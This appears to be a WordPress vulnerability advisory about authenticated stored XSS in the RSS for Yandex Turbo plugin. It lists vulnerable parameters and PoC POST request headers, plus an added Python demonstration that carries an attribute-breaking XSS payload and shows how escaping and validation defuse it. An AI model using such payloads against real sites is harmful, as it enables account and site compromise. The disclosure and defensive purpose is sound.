wpvulndb M0ze WPVDB-ID:9FCF6EBE-01D9-4730-A20E-58B192BB6D87
History: Jun 15, 2021 - 12:00 a.m.

RSS for Yandex Turbo <= 1.30 - Authenticated Stored XSS

2021-06-15 00:00:00
m0ze
wpscan.com
EPSS: 0.001 Low

Percentile: 22.7%

The plugin does not sanitise or escape some of its settings before saving and outputting them in the admin dashboard, leading to an Authenticated Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed.

PoC

Vulnerable parameter(s): &ytnetw=, &ytnetwspan=, &ytfeedbacknetw=, &ytfeedbacknetwspan=, &ytratingmin=, &ytratingmax=.

PoC #1 | Authenticated Persistent XSS | Yandex.Turbo Blocks > Social networks > Order:

POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3937

PoC #2 | Authenticated Persistent XSS | Yandex.Turbo Blocks > Feedback block > Button order:

POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3937

PoC #3 | Authenticated Persistent XSS | Yandex.Turbo Blocks > Rating > Rating range > From:

POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3937

PoC #4 | Authenticated Persistent XSS | Yandex.Turbo Blocks > Rating > Rating range > To:

POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3937
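
Why the missing output escaping matters and what the two fixes (validate on save, escape on output) change, as an added example that is not the plugin's code or part of the original advisory. The render functions are hypothetical stand-ins for the settings form, html.escape() stands in for WordPress's esc_attr(), and the sample body is constructed from the ytratingmin value shown in the PoC.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample body; the ytratingmin value is the one the PoC submits.
SAMPLE_BODY = ("ytrating=enabled"
               "&ytratingmin=1%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze"
               "&ytratingmax=5")


class InputAttrs(HTMLParser):
    """Record the (name, value) attribute pairs parsed for each <input>."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(attrs)


def parsed_attrs(markup):
    """Return the attributes an HTML parser sees on the first <input>."""
    parser = InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.inputs[0]


def stored_value(body, field):
    """Decode one field of a urlencoded form body, as the server would."""
    return parse_qs(body, keep_blank_values=True)[field][0]


def render_unescaped(name, value):
    # Models the flaw: the stored setting is pasted into the attribute as-is.
    return '<input type="text" name="%s" value="%s">' % (name, value)


def render_escaped(name, value):
    # Output escaping: the quote becomes &quot; and cannot close the attribute.
    return '<input type="text" name="%s" value="%s">' % (
        name, html.escape(value, quote=True))


def sanitize_rating(raw, default):
    # Save-time validation: a rating bound is a plain ASCII integer or rejected.
    raw = raw.strip()
    return int(raw) if raw.isascii() and raw.isdigit() else default


if __name__ == "__main__":
    raw = stored_value(SAMPLE_BODY, "ytratingmin")
    print([n for n, _ in parsed_attrs(render_unescaped("ytratingmin", raw))])
    print([n for n, _ in parsed_attrs(render_escaped("ytratingmin", raw))])
    print(sanitize_rating(raw, 1))
```

In the unescaped rendering the parser reports autofocus and onfocus as attributes of the input element; in the escaped rendering the whole stored string stays inside value.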

CPE

Name | Operator | Version
rss-for-yandex-turbo | eq | *
